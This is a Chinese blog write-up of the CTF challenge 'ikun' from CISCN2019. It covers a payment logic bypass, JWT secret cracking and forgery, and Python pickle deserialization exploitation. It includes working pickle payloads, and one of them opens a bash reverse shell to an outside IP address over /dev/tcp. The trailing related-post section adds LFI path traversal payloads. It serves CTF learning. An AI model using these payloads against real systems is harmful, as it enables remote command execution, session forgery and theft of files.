[BUU/Pickle/JWT] [CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2024-02-28 21:29:25 发布
最新推荐文章于 2024-02-28 21:29:25 发布
阅读量1.2k 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: # Write Up # Web安全 文章标签: Pickle JWT 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/DARKNOTES/article/details/123679537
本文揭秘了一次针对华北赛区CISCN2019 Day1 Web2比赛中的安全漏洞,涉及业务逻辑漏洞、JWT身份验证、Pickle反序列化攻击和Admin权限滥用。通过爆破JWT、构造伪造请求及利用后端源码中的安全漏洞,展示了狂热ikun如何利用这些技巧获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[CISCN2019 华北赛区 Day1 Web2]ikun

能做出这道题的,一定是狂热ikun吧(滑稽

业务逻辑漏洞

import requests

url = "http://ed0b4ae6-27c4-46f2-9281-8b0b0335be34.node4.buuoj.cn:81/shop?page="

for i in range(200):
    if "lv6.png" in requests.get(url+str(i)).text:
        print(i)

运行结果181

注册、登录、购买LV6,在购物车结算处抓包,

请添加图片描述

经测试,此处存在明显的逻辑漏洞,后端逻辑对前端数据有依赖关系,且可以注意到使用了JWT

且修改discount时(price不行)可以绕过支付逻辑,

相应302,跳转到/b1g_m4mber

直接访问该子目录,存在权限限制,要求为 admin权限,

JWT弱加密

本题中,抓包可以看到使用了JWT,猜测后端采用JWT方法进行身份验证,尝试使用JWT爆破脚本c-jwt-cracker-master爆破,

docker run -it --rm  jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFzZCJ9.BObCLjOjhd5VP8Ji2nhYaqzp01yT6KhkzQA2oY8FirA

请添加图片描述

关于Docker安装和配置,可查看本人其他博客[环境搭建/Docker]sqli-labs环境搭建/虚拟机部署Docker应用/同局域网可访问的Docker环境搭建

使用爆破得到的密码,在https://jwt.io/,构造伪造的JWT字符串,

请添加图片描述

使用构造的JWT,将数据包内的JWT替换(也可以将前端存储中Cookies表项JWT修改为伪造JWT,一劳永逸),

请添加图片描述

发包得到响应,

请添加图片描述

得知后台存在源码,

Pickle反序列化

下载源码,

在Admin.py中发现become处,存在可利用的反序列化点

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
	@tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            # 执行结果作为参数渲染到模板,有回显
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

且可以知道,Admin.py的路由绑定到了b1g_m4mber

请添加图片描述

构造序列化字符串

import base64
import pickle
import urllib
import os


class Evil(object):
    def __reduce__(self):
        # 无法利用回显
        # os.system无法回显执行结果,只回显命令执行结果
        # os.popen无返回值
        # 可通过模板渲染回显
        # 可以利用eval和read()函数读文件: (eval, ("open('/flag.txt','r').read()",))
        # commands.getoutput有回显,可以使用
        return (os.system, ("bash -c 'bash -i >& /dev/tcp/121.36.96.230/2333 0>&1'",))


evil = Evil()
print(urllib.quote(pickle.dumps(evil)))

输出如下,

# (commands.getoutput, ("ls /",))
ccommands%0Agetoutput%0Ap0%0A%28S%27ls%20/%27%0Ap1%0Atp2%0ARp3%0A.
# (commands.getoutput, ("cat /flag.txt",))
ccommands%0Agetoutput%0Ap0%0A%28S%27cat%20/flag.txt%27%0Ap1%0Atp2%0ARp3%0A.

# 或者
# (eval, ("open('/flag.txt','r').read()",))

# 或者,然而,本题环境并没有bash
# (commands.getoutput, ("bash -c 'bash -i >& /dev/tcp/121.36.96.230/2333 0>&1'",))
# ccommands%0Agetoutput%0Ap0%0A%28S%22bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/121.36.96.230/2333%200%3E%261%27%22%0Ap1%0Atp2%0ARp3%0A.

对反序列化点进行利用

请添加图片描述

对该按钮的包进行捕获(_xsrf是动态的),

使JWT与Payload的值为我们上面构造的那些即可,

请添加图片描述

请添加图片描述

[BUUCTF][CISCN2019 华北赛区 Day1 Web2]ikun
Y4tacker的博客
09-01 7609
文章目录知识点JWTPICKLEWP部分第一步找到lv6第二步BURP抓包修改pickel参考文章 知识点 JWT JWT相关 JWT解密网站 JWT破解利用工具 PICKLE Pickle模块中最常用的函数为: (1pickle.dump(obj, file, [,protocol]) 函数的功能:将obj对象序列化存入已经打开的file中。 参数讲解: obj:想要序列化的obj对象。 file:文件名称。 protocol:序
CISCN 华北赛区 Day1 Web2
kid的博客
06-14 2696
CISCN 华北赛区 Day1 Web2 前言 关注大佬的博客看到大佬又做了一道有意思的题还提供了环境,这里来体验下。 一看这个网站就很有意思…最近黑kunkun的可真多,前面0708那个漏洞github搜exp,下下来一运行 ,输出你打篮球真的很像CXK…过分…你打篮球才像CXK,你们全家打篮球都像CXK! 复现环境:https://github.com/CTFTraining/CISCN...
[CISCN2019 华北赛区 Day1 Web2]ikun
SopRomeo的博客
04-11 2421
没想到国赛也这么皮。哈哈哈哈。 源码提示我们要买到lv6 用脚本跑 import requests for i in range(1,1000): url = "http://0a047e4f-ced1-4f90-9dcd-663cef470c0f.node3.buuoj.cn/shop?page={}" url = url.format(i) print(url)...
CTFd之CISCN 华北赛区 Day1 Web2题目复现
weixin_43075257的博客
07-15 1935
知识点: 薅羊毛与逻辑漏洞 cookie伪造 python反序列化
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
qq_37301470的博客
11-28 1263
[CISCN2019 华北赛区 Day2 Web1]Hack World 分析 打开环境发现这个 All You Want Is In Table 'flag' and the column is 'flag' 还有个输入框 随便输一个数字1 返回 Hello, glzjin wants a girlfriend. 肯定是sql注入没跑了,而且要查找flag表下的flag字段 由于提交前后url没有变化,所以是通过POST方法提交了参数id。 打开hackbar模拟post过程 发现输入3 or 1=1
【复习】[CISCN2019 华北赛区 Day2 Web1]Hack World -----sql注入
Zero_Adam的博客
05-16 483
目录:一、自己做:二、 学到的:不足: 一、自己做: 输入12 的时候是有正常的查询结果的。然后输入3的话就超过了。 输入其他的,不是id数字的就直接bool (false) 然后fuzz测试:482是给过滤的。 过滤了不少,仔细看一下, handler过滤了。像强网杯的那些就不行了。 information 被过滤了。可以用那些sys来查找表明,然后用无列名注入就好。 limit 被过滤了。要么就union select 要么就不用了。 或,与过滤了。可以用 ^异或。 空格,注释符,/**/
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
2302_79800344的博客
02-28 3174
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解。
BUUCTF之[CISCN2019 华北赛区 Day2 Web1]Hack World ------- Boolean盲注
weixin_44632787的博客
10-05 452
第一眼看这题的时候还以为是堆叠查询,结果试了下发现并不是。然后试着试着发现这题其实是个bool盲注题。然后再写个Python脚本暴力破解就可以了(其实解题思路并不是自己想出来的,只是这题之前做过很多次了。所以现在再做的时候有印象) 这题没什么难的,主要知识点就是bool盲注。还有就是空格需要用括号()来绕过 先说一下网上找来的别的大佬的Payload # -*- coding:utf-8 -*- import requests import string def blind_injection(url).
python 重定向 ctf_BUUCTF-web ikun(Python 反序列化)
weixin_39796116的博客
12-10 350
正如本题所说,脑洞有点大。考点还很多,不过最核心的还是python的pickle反序列化漏洞题目中暗示了要6级号,找了很多页都没看到,于是写了脚本在第180页有6级号,但是价格出奇的高,明显买不起。bp抓包发现有疑似折扣的参数,把值改低后提交,重定向到了后台页面,但是需要admin才行。这时一早就发现的JWT便派上了用场。在https://jwt.io/在线解析jwt。data段有我们的用户名,可...
BUUCTF--[watevrCTF-2019]Pickle Store
qq_46263951的博客
08-08 528
一般看到商店需要购买flag的直接就会想到session和cookie 我们先将session的值来接
BUUCTF WEB PICKLE STORE
qq_41696858的博客
09-30 413
众所周知,buuctf靶场经历了内网K8S改造,导致以前的小号的内网靶机的方法出了问题,我也疑惑了很久,该怎么去用这台不知道公网ip的靶机。后来我想明白了,给的是apache2的公网ip,那就直接外带啊,果然成功了,哈哈。看着像base64,解码一下,发现一个标志:anti_tamper_hmac。无法逆向的hmac,那么结合题目的pickle,八九不离十的猜是反序列化。这一题是一个简单的python反序列化,简单的写个脚本就好,没啥好说的。关于pickle的指令解析可以看这个师傅的。
-------已搬运------BUUCTF:[RootersCTF2019]ImgXweb --- jwt --寻找secret,easy
Zero_Adam的博客
04-22 568
目录:一、自己做:二、不足: 一、自己做: 一个见过很多次的登陆,注册框, 登陆后,抓包能够看到jwt, eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYXNkZiJ9.nqJZ6UZ3eIQ9IbFZajzs0LdGSJJnLAbgpESvVlofrKc 解码后: {"typ":"JWT","alg":"HS256"}{"user":"asdf"}Y醷x=!Yj<쐷FHg,ऄVZ 登陆进来之后,能上传文件,任意文件都能够上传,但是.htac
BUUCTF:[CISCN2019 华东南赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 1058
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
-------已搬运--BUUCTF:[SWPU2019]Web3 --- jwt 的secret的获取 --- unzip的软练级攻击
Zero_Adam的博客
04-20 1517
目录:000、知识点1.os.path.dirname2. unzip 和下面这个zip一块的,没必要看,遇到题目的时候现搜就行。3. zipfile一、自己做:2.看一看WP二、学到的:三、 学习WP 重点,我感觉是 jwt 的 那块是个点, 有乱码之后要寻找secret,然后可用404来获取jwt的secret, 再是unzip的软连接攻击这个东西,以前没见过的。 学习一下Linux的软连接,然后再来修改修改 000、知识点 1.os.path.dirname python3 获取当前路径及os.pat
BUUCTF刷题记录[RootersCTF2019]ImgXweb——JWT验证问题
u013119911的博客
07-02 8620
JWT
buuctf刷题之旅(三) 知识点+坑
qq_50589021的博客
11-05 1861
[NCTF2019]True XML cookbook WP 最后一位不一定是11,需要自己内网探测 打2021的geek大挑战了 [MRCTF2020]套娃 WP [极客大挑战 2019]RCE ME WP [CISCN2019 华北赛区 Day1 Web2]ikun JWTpickle反序列化 WP [WUSTCTF2020]颜值成绩查询 import requests url= 'http://b91f52c4-276b-4113-9ede-54fb712ac6da.node3.buuoj.cn/
BUUCTF-社团考核
qq_60905276的博客
09-24 1917
BUUCTF上面的题
buu lfi course 1 1
最新发布
03-14
<think>好的,我现在需要处理用户关于BUU LFI COURSE 1的问题。首先,用户希望找到与该课程相关的资料或内容,特别是第一单元的内容。根据提供的引用信息,我需要整理已有的信息并生成相关的解答和相关问题。 首先,我需要回顾所有相关的引用。引用[2]、[3]、[4]、[5]都涉及BUU LFI COURSE 1的内容。根据这些引用,可以总结出该课程主要涉及PHP文件包含漏洞的利用。用户提到的Level 1 Unit 1可能指的是这个课程的第一个挑战或实验,其中涉及通过文件包含漏洞获取flag。 接下来,我需要确保回答符合用户的要求,即结构清晰、步骤详细,并且引用正确的资料。根据引用[2],题目开局给出源代码,存在文件包含漏洞,通过传递file参数来包含文件。引用[3]和[5]提到这是一个PHP文件,代码简单,存在文件包含漏洞,需要利用路径遍历来访问上级目录中的flag文件。引用[4]和[5]指出需要退到根目录,可能需要多次使用../来访问flag,比如三次或四次。 在回答中,我需要分步骤说明如何解决这个问题,包括漏洞分析、利用方法、路径遍历的具体操作以及最终的payload示例。同时,需要确保引用正确,每个引用在适当的位置标注。例如,在提到路径遍历时,引用[2]和[5]都提到了使用../,所以需要注明这些来源。 另外,用户可能希望了解相关的扩展知识,例如防御文件包含漏洞的方法,或者该漏洞的实际应用场景,所以生成的相关问题应该覆盖这些方面。例如,如何防御文件包含漏洞,或者文件包含漏洞的其他利用方式。 最后,需要检查所有LaTeX格式是否正确,行内公式用$...$,独立公式用$$...$$,但根据当前问题内容,可能不需要数学公式,所以这部分可能不需要处理。但如果有变量或路径表达式,需要正确使用格式。例如,路径中的../可能需要使用代码块或引号,但根据示例,代码块应使用反引号包裹。 总结回答的结构应该是: 1. 漏洞背景和题目描述 2. 漏洞分析步骤 3. 利用方法的具体步骤 4. 最终Payload示例 5. 引用标注 6. 相关问题生成 现在需要将这些整理成自然的中文回答,确保引用正确,结构清晰,并且符合用户的要求。</think>### BUU LFI COURSE 1 第一单元内容解析 #### 1. 漏洞背景与题目描述 该课程实验聚焦于**PHP文件包含漏洞**的利用。题目初始界面给出PHP源代码,要求通过传递参数`file`触发文件包含漏洞,最终获取隐藏的flag[^3][^5]。 #### 2. 漏洞分析步骤 1. **代码审计** 题目PHP代码结构简单,核心逻辑如下: ```php <?php if(isset($_GET['file'])){ include $_GET['file']; } ``` 此处未对用户输入的`file`参数进行过滤,导致可加载任意文件(包括远程文件或路径遍历)[^3][^4]。 2. **错误信息利用** 直接访问`?file=flag`会报错,提示文件不存在,说明flag不在当前目录,需通过路径遍历向上级目录查找[^2]。 #### 3. 漏洞利用方法 1. **路径遍历攻击** 使用`../`回退到根目录,尝试加载`flag`文件: ```url http://靶场URL/?file=../../../flag ``` 根据实际环境,可能需要调整`../`的数量(如3-4次)才能定位到根目录[^5]。 2. **最终Payload示例** 成功获取flag的请求如下: ```url http://b6ed0fd6.../?file=../../../flag ``` 返回结果包含flag:`flag{59132e77-fb4e-455f-b7e7-21ea02be8bd8}`。 #### 4. 关键知识点总结 - **文件包含漏洞类型**:本地文件包含(LFI)与远程文件包含(RFI)。 - **防御方法**:对输入参数进行白名单校验,或使用`basename()`函数过滤路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值